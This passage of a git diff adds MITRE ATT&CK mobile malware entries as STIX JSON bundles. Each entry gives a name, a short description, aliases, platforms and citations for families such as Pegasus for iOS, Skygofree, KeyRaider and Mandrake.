+ "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2021-04-19T17:11:50.159Z", + "name": "Desert Scorpion", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) is surveillanceware that has targeted the Middle East, specifically individuals located in Palestine. [Desert Scorpion](https://attack.mitre.org/software/S0505) is suspected to have been operated by the threat actor APT-C-23.(Citation: Lookout Desert Scorpion) ", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--33d9d91d-aad9-49d5-a516-220ce101ac8a.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--33d9d91d-aad9-49d5-a516-220ce101ac8a.json new file mode 100644 index 0000000000000000000000000000000000000000..9970e42129ada25d2bef9896cac79917452407b9 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--33d9d91d-aad9-49d5-a516-220ce101ac8a.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--815b49aa-accb-45a1-ad61-17d1863401c5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Pegasus for iOS", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. It has been advertised and sold to target high-value victims. (Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Pegasus for iOS" + ], + "type": "malware", + "id": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "created": "2017-10-25T14:48:44.238Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0289", + "external_id": "S0289" + }, + { + "source_name": "Pegasus for iOS", + "description": "(Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab)" + }, + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + }, + { + "source_name": "PegasusCitizenLab", + "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group\u2019s iPhone Zero-Days used against a UAE Human Rights Defender. 
Retrieved December 12, 2016.", + "url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--35aae10a-97c5-471a-9c67-02c231a7a31a.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--35aae10a-97c5-471a-9c67-02c231a7a31a.json new file mode 100644 index 0000000000000000000000000000000000000000..1d5c0c33ec4c48b359c15da29a9bfbc50027a4f3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--35aae10a-97c5-471a-9c67-02c231a7a31a.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--3a257722-aca9-4278-9ddc-78e4681a94f5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Tangelo", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) is iOS malware that is believed to be from the same developers as the [Stealth Mango](https://attack.mitre.org/software/S0328) Android malware. It is not a mobile application, but rather a Debian package that can only run on jailbroken iOS devices. (Citation: Lookout-StealthMango)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Tangelo" + ], + "type": "malware", + "id": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0329", + "external_id": "S0329" + }, + { + "source_name": "Tangelo", + "description": "(Citation: Lookout-StealthMango)" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b.json new file mode 100644 index 0000000000000000000000000000000000000000..b449d083940d5b9c320037d8f44978d3f2cc6fa8 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--055dfbc1-3093-4d29-9376-32d9803399a4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "RCSAndroid", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) is Android malware. (Citation: TrendMicro-RCSAndroid)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "RCSAndroid" + ], + "type": "malware", + "id": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "created": "2017-10-25T14:48:38.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0295", + "external_id": "S0295" + }, + { + "source_name": "RCSAndroid", + "description": "(Citation: TrendMicro-RCSAndroid)" + }, + { + "source_name": "TrendMicro-RCSAndroid", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--366c800f-97a8-48d5-b0a6-79d00198252a.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--366c800f-97a8-48d5-b0a6-79d00198252a.json new file mode 100644 index 0000000000000000000000000000000000000000..728016fcb1f93a0eddf557faaaceafe0ccf45eed --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--366c800f-97a8-48d5-b0a6-79d00198252a.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--24d42bbf-e163-4028-ad39-db9fdc867ae3", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Corona Updates", + "Wabi Music", + "Concipit1248" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "type": "malware", + "created": "2020-04-24T15:06:32.870Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0425", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0425" + }, + { + "source_name": "Wabi Music", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "Concipit1248", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-09-11T15:45:38.235Z", + "name": "Corona Updates", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) is Android spyware that took advantage of the Coronavirus pandemic. The campaign distributing this spyware is tracked as Project Spy. Multiple variants of this spyware have been discovered to have been hosted on the Google Play Store.(Citation: TrendMicro Coronavirus Updates)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3a913bac-4fae-4d0e-bca8-cae452f1599b.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3a913bac-4fae-4d0e-bca8-cae452f1599b.json new file mode 100644 index 0000000000000000000000000000000000000000..220579e09ab6b42daff01fd518544ee5f95b427e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3a913bac-4fae-4d0e-bca8-cae452f1599b.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--67aa9091-62d0-43d1-ba3d-d7025649da7e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Skygofree", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) is Android spyware that is believed to have been developed in 2014 and used through at least 2017. (Citation: Kaspersky-Skygofree)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Skygofree" + ], + "type": "malware", + "id": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0327", + "external_id": "S0327" + }, + { + "source_name": "Skygofree", + "description": "(Citation: Kaspersky-Skygofree)" + }, + { + "source_name": "Kaspersky-Skygofree", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50.json new file mode 100644 index 0000000000000000000000000000000000000000..3cc841215821ce755f849e2634b7150c05f20d14 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--1d42315c-8368-4a56-9201-535e1e8a28da", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "KeyRaider", + "description": "[KeyRaider](https://attack.mitre.org/software/S0288) is malware that steals Apple account credentials and other data from jailbroken iOS devices. It also has ransomware functionality. (Citation: Xiao-KeyRaider)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50", + "created": "2017-10-25T14:48:43.815Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0288", + "external_id": "S0288" + }, + { + "source_name": "KeyRaider", + "description": "(Citation: Xiao-KeyRaider)" + }, + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0.json new file mode 100644 index 0000000000000000000000000000000000000000..11e29ccb0392fd57d6e9c875d0b14bde1421923b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--2a7a4d18-7cc7-4a95-b821-dcb39bfbdd83", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "ZergHelper", + "description": "[ZergHelper](https://attack.mitre.org/software/S0287) is iOS riskware that was unique due to its apparent evasion of Apple's App Store review process. No malicious functionality was identified in the app, but it presents security risks. (Citation: Xiao-ZergHelper)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0", + "created": "2017-10-25T14:48:44.853Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0287", + "external_id": "S0287" + }, + { + "source_name": "ZergHelper", + "description": "(Citation: Xiao-ZergHelper)" + }, + { + "source_name": "Xiao-ZergHelper", + "description": "Claud Xiao. (2016, February 21). Pirated iOS App Store\u2019s Client Successfully Evaded Apple iOS Code Review. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3d6c4389-3489-40a3-beda-c56e650b6f68.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3d6c4389-3489-40a3-beda-c56e650b6f68.json new file mode 100644 index 0000000000000000000000000000000000000000..4c78a99015788198e656023b2a0b5e09a54c7c01 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3d6c4389-3489-40a3-beda-c56e650b6f68.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--2bec3cf3-c7dc-4300-832a-4b3855d554b2", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "DoubleAgent" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "type": "malware", + "created": "2020-12-24T21:50:02.027Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0550", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0550" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-04-19T17:05:42.253Z", + "name": "DoubleAgent", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) is a family of RAT malware dating back to 2013, known to target groups with contentious relationships with the Chinese government.(Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c.json new file mode 100644 index 0000000000000000000000000000000000000000..3ab3036547ddb79c64bd7b4aa64eef0d51a3982f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--39cb50f9-d713-43c6-8171-fc3722665d1b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Twitoor", + "description": "[Twitoor](https://attack.mitre.org/software/S0302) is a dropper application capable of receiving commands from social media.(Citation: ESET-Twitoor)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Twitoor" + ], + "type": "malware", + "id": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", + "created": "2017-10-25T14:48:42.313Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0302", + "external_id": "S0302" + }, + { + "source_name": "Twitoor", + "description": "(Citation: ESET-Twitoor)" + }, + { + "source_name": "ESET-Twitoor", + "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016.", + "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--4b53eb01-57d7-47b4-b078-22766b002b36.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--4b53eb01-57d7-47b4-b078-22766b002b36.json new file mode 100644 index 0000000000000000000000000000000000000000..2d9e7effef6615d9a640149958aa539dc5a5cab4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--4b53eb01-57d7-47b4-b078-22766b002b36.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--89dd569f-7b05-447e-8151-2e7911a11aa8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T22:32:16.509Z", + "name": "S.O.V.A.", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) is an Android banking trojan that was first identified in August 2021 and has subsequently been found in a variety of applications, including banking, cryptocurrency wallet/exchange, and shopping apps. [S.O.V.A.](https://attack.mitre.org/software/S1062), which is Russian for \"owl\", contains features not commonly found in Android malware, such as session cookie theft.(Citation: threatfabric_sova_0921)(Citation: cleafy_sova_1122)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "S.O.V.A." + ], + "type": "malware", + "id": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "created": "2023-02-06T19:34:43.026Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1062", + "external_id": "S1062" + }, + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + }, + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. 
Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--4bf6ba32-4165-42c1-b911-9c36165891c8.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--4bf6ba32-4165-42c1-b911-9c36165891c8.json new file mode 100644 index 0000000000000000000000000000000000000000..fd2402a09752f78145c55e7593937b8fa90ecd2c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--4bf6ba32-4165-42c1-b911-9c36165891c8.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--26b81283-4788-4d01-8b1d-fa9519d5f54c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "ANDROIDOS_ANSERVER.A", + "description": "[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) is Android malware that is unique because it uses encrypted content within a blog site for command and control. (Citation: TrendMicro-Anserver)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "ANDROIDOS_ANSERVER.A" + ], + "type": "malware", + "id": "malware--4bf6ba32-4165-42c1-b911-9c36165891c8", + "created": "2017-10-25T14:48:47.965Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0310", + "external_id": "S0310" + }, + { + "source_name": "ANDROIDOS_ANSERVER.A", + "description": "(Citation: TrendMicro-Anserver)" + }, + { + "source_name": "TrendMicro-Anserver", + "description": "Karl Dominguez. (2011, October 2). Android Malware Uses Blog Posts as C&C. Retrieved February 6, 2017.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878.json new file mode 100644 index 0000000000000000000000000000000000000000..010c3d9f441ab48e96327d959ff10e1b0847e0bf --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--6c2b09c0-0980-4685-9bcf-04861664380b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "DualToy", + "description": "[DualToy](https://attack.mitre.org/software/S0315) is Windows malware that installs malicious applications onto Android and iOS devices connected over USB. (Citation: PaloAlto-DualToy)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878", + "created": "2017-10-25T14:48:41.721Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0315", + "external_id": "S0315" + }, + { + "source_name": "DualToy", + "description": "(Citation: PaloAlto-DualToy)" + }, + { + "source_name": "PaloAlto-DualToy", + "description": "Claud Xiao. (2016, September 13). DualToy: New Windows Trojan Sideloads Risky Apps to Android and iOS Devices. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--52c994fa-b6c8-45a8-9586-a4275cf19307.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--52c994fa-b6c8-45a8-9586-a4275cf19307.json new file mode 100644 index 0000000000000000000000000000000000000000..71fe12f16e7e764dc992060f30149169d11a41cd --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--52c994fa-b6c8-45a8-9586-a4275cf19307.json 
@@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--fdf693fa-daeb-4d2a-9057-2a4cdc0bdaef", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Mandrake", + "oxide", + "briar", + "ricinus", + "darkmatter" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "type": "malware", + "created": "2020-07-15T20:20:58.846Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0485", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0485" + }, + { + "source_name": "oxide", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "briar", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "ricinus", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "darkmatter", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-09-11T15:52:12.097Z", + "name": "Mandrake", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) is a sophisticated Android espionage platform that has been active in the wild since at least 2016. 
[Mandrake](https://attack.mitre.org/software/S0485) is very actively maintained, with sophisticated features and attacks that are executed with surgical precision.\n\n[Mandrake](https://attack.mitre.org/software/S0485) has gone undetected for several years by providing legitimate, ad-free applications with social media and real reviews to back the apps. The malware is only activated when the operators issue a specific command.(Citation: Bitdefender Mandrake)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--56660521-6db4-4e5a-a927-464f22954b7c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--56660521-6db4-4e5a-a927-464f22954b7c.json new file mode 100644 index 0000000000000000000000000000000000000000..0966e462bdfc2268d94563e52e1d3f912cf2991f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--56660521-6db4-4e5a-a927-464f22954b7c.json 
